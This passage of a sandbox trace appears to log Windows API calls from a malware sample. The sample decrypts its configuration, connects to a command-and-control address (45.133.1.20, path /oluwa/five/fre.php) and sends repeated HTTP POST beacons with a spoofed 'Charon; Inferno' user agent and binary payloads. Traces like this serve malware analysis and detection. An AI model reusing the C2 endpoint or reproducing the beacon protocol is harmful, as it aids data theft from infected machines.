dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0213.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.659] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.663] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.663] GetProcessHeap () returned 0x6a0000 [0213.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0213.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.665] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0213.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.666] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0213.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.667] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0213.667] GetProcessHeap () returned 0x6a0000 [0213.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0213.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.669] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.679] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.680] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.681] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.681] GetProcessHeap () returned 0x6a0000 [0213.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0213.681] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.681] GetProcessHeap () returned 0x6a0000 [0213.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0213.682] GetProcessHeap () returned 0x6a0000 [0213.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0213.682] GetProcessHeap () returned 0x6a0000 [0213.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0213.685] GetProcessHeap () returned 0x6a0000 [0213.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0213.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.687] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.693] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0213.701] GetProcessHeap () returned 0x6a0000 [0213.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0213.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.702] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0213.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.703] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.704] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.704] GetProcessHeap () returned 0x6a0000 [0213.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0213.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.708] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0213.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.710] CryptDestroyKey (hKey=0x6ad020) returned 1 [0213.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.711] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0213.711] GetProcessHeap () returned 0x6a0000 [0213.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0213.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.712] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0213.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.713] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0213.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.714] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0213.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.715] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0213.715] GetProcessHeap () returned 0x6a0000 [0213.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0213.715] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0213.715] GetProcessHeap () returned 0x6a0000 [0213.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0213.716] socket (af=2, type=1, protocol=6) returned 0x5f8 [0213.716] connect (s=0x5f8, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0213.743] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0213.743] GetProcessHeap () returned 0x6a0000 [0213.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0213.743] GetProcessHeap () returned 0x6a0000 [0213.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0213.744] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0213.745] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0213.745] GetProcessHeap () returned 0x6a0000 [0213.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0213.745] GetProcessHeap () returned 0x6a0000 [0213.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0213.746] GetProcessHeap () returned 0x6a0000 [0213.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0213.746] GetProcessHeap () returned 0x6a0000 [0213.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0213.747] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0213.750] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0213.750] GetProcessHeap () returned 0x6a0000 [0213.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0213.750] GetProcessHeap () returned 0x6a0000 [0213.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0213.751] send (s=0x5f8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0213.751] send (s=0x5f8, buf=0x6bb998*, len=159, flags=0) returned 159 [0213.751] GetProcessHeap () returned 0x6a0000 [0213.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0213.751] recv (in: s=0x5f8, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0213.818] GetProcessHeap () returned 0x6a0000 [0213.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0213.818] GetProcessHeap () returned 0x6a0000 [0213.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0213.819] GetProcessHeap () returned 0x6a0000 [0213.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0213.823] GetProcessHeap () returned 0x6a0000 [0213.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0213.823] closesocket (s=0x5f8) returned 0 [0213.824] GetProcessHeap () returned 0x6a0000 [0213.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0213.824] GetProcessHeap () returned 0x6a0000 [0213.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0213.825] GetProcessHeap () returned 0x6a0000 [0213.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0213.825] GetProcessHeap () returned 0x6a0000 [0213.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0213.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4e8) returned 0x5f8 [0213.829] Sleep (dwMilliseconds=0xea60) [0213.830] GetProcessHeap () returned 0x6a0000 [0213.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0213.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.832] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.890] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0213.933] GetProcessHeap () returned 0x6a0000 [0213.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0213.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.934] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0213.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.946] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.947] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.947] GetProcessHeap () returned 0x6a0000 [0213.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0213.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.949] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0213.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.950] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0213.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.951] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0213.951] GetProcessHeap () returned 0x6a0000 [0213.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0213.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.952] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.953] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.954] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.956] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.956] GetProcessHeap () returned 0x6a0000 [0213.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0213.956] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.960] GetProcessHeap () returned 0x6a0000 [0213.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0213.961] GetProcessHeap () returned 0x6a0000 [0213.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0213.961] GetProcessHeap () returned 0x6a0000 [0213.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0213.961] GetProcessHeap () returned 0x6a0000 [0213.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0213.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.963] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.973] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0213.979] GetProcessHeap () returned 0x6a0000 [0213.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0213.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.980] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0213.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.982] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.983] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.983] GetProcessHeap () returned 0x6a0000 [0213.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0213.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.985] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0213.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.986] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0213.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.987] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0213.987] GetProcessHeap () returned 0x6a0000 [0213.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0213.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.988] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0213.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.989] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0213.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.990] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0213.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.993] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0213.993] GetProcessHeap () returned 0x6a0000 [0213.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0213.993] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0213.993] GetProcessHeap () returned 0x6a0000 [0213.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0213.993] socket (af=2, type=1, protocol=6) returned 0x5fc [0213.995] connect (s=0x5fc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0214.024] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0214.024] GetProcessHeap () returned 0x6a0000 [0214.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0214.024] GetProcessHeap () returned 0x6a0000 [0214.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0214.025] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.025] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.026] GetProcessHeap () returned 0x6a0000 [0214.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0214.026] GetProcessHeap () returned 0x6a0000 [0214.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0214.026] GetProcessHeap () returned 0x6a0000 [0214.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0214.026] GetProcessHeap () returned 0x6a0000 [0214.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0214.027] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.028] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.028] GetProcessHeap () returned 0x6a0000 [0214.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0214.028] GetProcessHeap () returned 0x6a0000 [0214.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0214.029] send (s=0x5fc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0214.029] send (s=0x5fc, buf=0x6bb998*, len=159, flags=0) returned 159 [0214.029] GetProcessHeap () returned 0x6a0000 [0214.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0214.030] recv (in: s=0x5fc, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0214.120] GetProcessHeap () returned 0x6a0000 [0214.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0214.124] GetProcessHeap () returned 0x6a0000 [0214.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0214.125] GetProcessHeap () returned 0x6a0000 [0214.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0214.125] GetProcessHeap () returned 0x6a0000 [0214.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0214.126] closesocket (s=0x5fc) returned 0 [0214.127] GetProcessHeap () returned 0x6a0000 [0214.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0214.127] GetProcessHeap () returned 0x6a0000 [0214.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.127] GetProcessHeap () returned 0x6a0000 [0214.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0214.128] GetProcessHeap () returned 0x6a0000 [0214.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0214.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8ec) returned 0x5fc [0214.140] Sleep (dwMilliseconds=0xea60) [0214.141] GetProcessHeap () returned 0x6a0000 [0214.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0214.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.143] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.160] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0214.166] GetProcessHeap () returned 0x6a0000 [0214.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0214.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.167] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0214.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.175] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.176] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.176] GetProcessHeap () returned 0x6a0000 [0214.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0214.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.177] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, 